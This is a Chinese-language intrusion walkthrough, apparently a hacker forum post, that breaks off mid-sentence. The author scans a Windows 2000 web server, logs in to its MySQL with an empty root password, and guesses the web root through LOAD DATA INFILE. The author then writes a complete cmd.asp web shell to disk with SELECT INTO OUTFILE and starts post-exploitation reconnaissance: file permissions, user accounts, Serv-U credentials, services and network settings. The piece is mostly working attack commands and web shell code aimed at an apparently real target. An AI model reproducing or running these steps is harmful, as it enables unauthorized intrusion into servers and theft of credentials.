Ok!先用nmap扫描一下，扫描结果如下：
　　　　25/tcp open smtp
　　　　53/tcp open domain
　　　　80/tcp open http
　　　　110/tcp open pop-3
　　　　389/tcp open ldap
　　　　1002/tcp open unknown
　　　　3306/tcp open mysql
　　
　　　　然后从IIS版本判断目标是windows 2000服务器。从开放的端口来看，它要么是安装了防火墙，要么是做了TCP/IP过滤，呵呵，比abc.target.net有意思多了。从25和110端口返回的数据来看，他们用的邮件服务器是IMail 6.04，没什么可利用的。IIS上面网管做了安全配置，一些默认的CGI漏洞也没有，这也没什么好利用的。只剩下最后一个端口了，习惯性的用我的mysql客户端连接试试：
　　
　　　　F:\cmd〉mysql -u root -h www.target.net
　　　　Welcome to the MySQL monitor. Commands end with ; or \g.
　　　　Your MySQL connection id is 3038 to server version: 3.23.21-beta
　　　　Type ’help;’ or ’\h’ for help. Type ’\c’ to clear the buffer
　　　　mysql〉
　　
　　　　呵呵，不好意思，看来网管没有给mysql帐号root设置一个密码，是默认的空密码，那么我们就可以利用这个漏洞来做点什么了。如果是MS-SQL数据库的话就好办啦，直接可以用xp_cmdshell来运行系统命令，但是可惜的是mysql没有类似MS-SQL那样的扩展存储过程。
　　
　　　　现在我们可以利用这个漏洞来做三件事情：
　　
　　〈1〉搜索mysql数据库里面的内容，看能不能找出一些有用的敏感信息，我找了一会儿就不想找了，呵呵
　　
　　〈2〉读取服务器上的任何文件，当然前提是知道文件的物理路径
　　
　　〈3〉以启动mysql服务用户的权限往服务器上写文件，前提是这个文件要不存在的，就是说不能覆盖文件
　　
　　
　　　　如果我们知道IIS主目录的物理路径的话,我们就可以往上面写一个ASP上去，然后通过IE来执行系统命令。怎么得到IIS目录的物理路径呢？天知道！
　　
　　　　没办法，猜吧。。。。。。先在mysql默认数据库test中建一个表tmp，这个表只有一个字段str,类型为TEXT,
　　
　　　　mysql〉 use test;create table tmp（str TEXT）;
　　　　Database changed
　　　　Query OK, 0 rows affected （0.05 sec）
　　
　　　　然后凭着自己做网管的直觉，开始猜测IIS主目录的物理路径，c:\inetpub\wwwroot，c:\www，c:\wwwroot，c:\inetpub\web,d:\web，d:\wwwroot，都不对，55555。大概猜测到第10次，我的mysql客户端回显信息如下：
　　
　　mysql〉 load data infile ""d:\\www\\gb\\about\\about.htm"" into table tmp;
　　Query OK, 235 rows affected （0.05 sec）
　　Records: 235 Deleted: 0 Skipped: 0 Warnings: 0
　　
　　　　哈哈哈，猜中了，IIS主目录的物理路径是d:\www，因为上面的文件的虚拟路径是http://www.target.net/gb/about/about.htm，看来我得到一个shell了，呵呵。
　　
　　　　接下来我们就可以往d:\www\gb\about里面写一个ASP文件进去，然后通过http://www.target.net/gb/about/cmd.asp来执行系统命令了。然后在网上找来一个现成的cmd.asp，懒的自己去写了：）。Cmd.asp如下：
　　-------------------------------cmd.asp----------------------------------------
　　
　　〈% Dim oScript
　　Dim oScriptNet
　　Dim oFileSys, oFile
　　Dim szCMD, szTempFile
　　On Error Resume Next
　　Set oScript = Server.CreateObject（""""WSCRIPT.SHELL""""）
　　Set oScriptNet = Server.CreateObject（""""WSCRIPT.NETWORK""""）
　　Set oFileSys = Server.CreateObject（""""Scripting.FileSystemObject""""）
　　szCMD = Request.Form（"""".CMD""""）
　　If （szCMD 〈〉 """"""""） Then
　　szTempFile = """"C:\"" & oFileSys.GetTempName（）
　　Call oScript.Run （""""cmd.exe /c """" & szCMD & """" 〉 """" & szTempFile, 0, True）
　　Set oFile = oFileSys.OpenTextFile （szTempFile, 1, False, 0）
　　End If %〉
　　〈HTML〉〈BODY〉〈FORM action=""""〈%= Request.ServerVariables（""""URL""""） %〉"""" method=""""POST""""〉
　　〈input type=text name="""".CMD"""" size=45 value=""""〈%= szCMD %〉""""〉〈input type=submit value=""""Run""""〉〈/FORM〉〈PRE〉
　　〈% If （IsObject（oFile）） Then
　　On Error Resume Next
　　Response.Write Server.HTMLEncode（oFile.ReadAll）
　　oFile.Close
　　Call oFileSys.DeleteFile（szTempFile, True）
　　End If%〉
　　〈/BODY〉〈/HTML〉
　　
　　----------------------------end of cmd.asp-----------------------------------
　　
　　　　由于往mysql数据库中插入数据的时候，会过滤特殊字符什么的，例如双引号之类的，特别麻烦。各位留意没有，上面的ASP语句中，都是两个双引号一起的，这样才能写进去，原来是一个双引号的。然后我在数据库中再建一个表：
　　
　　mysql〉 use test;create table cmd（str TEXT）;
　　Database changed
　　Query OK, 0 rows affected （0.05 sec）
　　
　　　　然后用如下语句，一句一句把上面的ASP写进去:
　　
　　mysql〉 insert into cmd values（""一行一行的asp代码，呵呵""）;
　　
　　　　为什么不全部一起写进去呢？呵呵，换行后，一会儿导出的文件就会有特殊字符了，asp就不能正常运行了，只能辛苦点一行一行写了。然后把asp文件导到服务器上：
　　
　　mysql〉select * from cmd into outfile ""d:\\www\\gb\\abou\\cmd.asp"";
　　
　　　　然后把我们刚才建的表都删除掉：
　　
　　mysql〉 use test; drop table tmp; drop table cmd;
　　
　　　　ok!我们得到一个shell了，虽然权限不高，但毕竟已经向取得admin权限迈出一大步了，不是吗，呵呵。做这个asp文件可花了我不少时间哦。现在我们利用这个shell来收集系统信息，尝试取得admin权限。
　　
　　〈1〉先看一下系统文件权限设置如何：
　　c:\ Everyone:（OI）（CI）F
　　d:\ \xxx:（OI）（CI）（DENY）（特殊访问:）
　　DELETE
　　READ_CONTROL
　　WRITE_DAC
　　WRITE_OWNER
　　STANDARD_RIGHTS_REQUIRED
　　FILE_READ_DATA
　　FILE_WRITE_DATA
　　FILE_APPEND_DATA
　　FILE_READ_EA
　　FILE_WRITE_EA
　　FILE_EXECUTE
　　FILE_DELETE_CHILD
　　FILE_READ_ATTRIBUTES
　　FILE_WRITE_ATTRIBUTES
　　
　　Everyone:（OI）（CI）F
　　
　　　　看来我们现在就可以读写硬盘上的任何文件了，现在就可以改他的首页了，但这样做没意思，对不对，我们的目标是取得admin权限，呵呵。
　　〈2〉然后搜索一下硬盘上都有些什么文件：
　　
　　c:\Program Files 的目录下有两个比较有意思的文件，
　　
　　2000-12-19 13:10 　Serv-U
　　2001-01-20 22:43 绿色警戒
　　
　　把Serv-U里面的用户和密码读出来看看后，没有什么用处，然后进入绿色警戒目录看看，呵呵，除了log外，什么都没有，呵呵。
　　
　　〈3〉再看看都有哪些用户：
　　
　　Guest IUSR_SERVER_1 IUSR_SERVER-2
　　IWAM_SERVER_1 IWAM_SERVER-2 ceo[他们CEO的帐号J]
　　TsInternetUser
　　
　　　　管理员有ceo 和target\Domain Admins，看来这台机器是他们域中的一台服务器。开始本来想给ceo下一个套，在他的启动目录里放一个程序，但后来看到这个帐号已经几个月没登陆了，就放弃了。
　　
　　〈4〉看看启动了那些服务，这几个比较有意思, 看来都是默认的：
　　
　　Task Scheduler
　　Simple Mail Transport Protocol （SMTP）
　　Task Scheduler
　　
　　〈5〉看看网络状况，这几个比较有意思：
　　
　　TCP 0.0.0.0:21 0.0.0.0:0 LISTENING
　　TCP 0.0.0.0:119 0.0.0.0:0 LISTENING
　　TCP 192.168.1.3:3389 0.0.0.0:0 LISTENING
　　
　　　　看来有TermService，不过在网卡上做了TCP/IP过滤，只对内网开放，那么我们就来
　　
　　〈6〉看看网卡设置信息：
　　
　　Ethernet adapter 本地连接:
　　Connection-specific DNS Suffix . :
　　Description . . . . . . . . . . . : Realtek RTL8139（A） PCI Fast Ethernet Adapter
　　Physical Address. . . . . . . . . : 00-E0-4C-68-C4-B2
　　DHCP Enabled. . . . . . . . . . . : No
　　IP Address. . . . . . . . . . . . : 192.168.1.3
　　Subnet Mask . . . . . . . . . . . : 255.255.255.0
　　Default Gateway . . . . . . . . . :
　　DNS Servers . . . . . . . . . . . :
　　Ethernet adapter 本地连接 2:
　　Connection-specific DNS Suffix . :
　　Description . . . . . . . . . . . : Realtek RTL8139（A） PCI Fast Ethernet Adapter#2
　　Physical Address. . . . . . . . . : 00-E0-4C-68-B8-FC
　　DHCP Enabled. . . . . . . . . . . : No
　　IP Address. . . . . . . . . . . . :xxx
　　Subnet Mask . . . . . . . . . . . :
　　Default Gateway . . . . . . . . . :
　　
　　　　经过上面的一些步骤，对这台服务器的设置情况就有了一个大概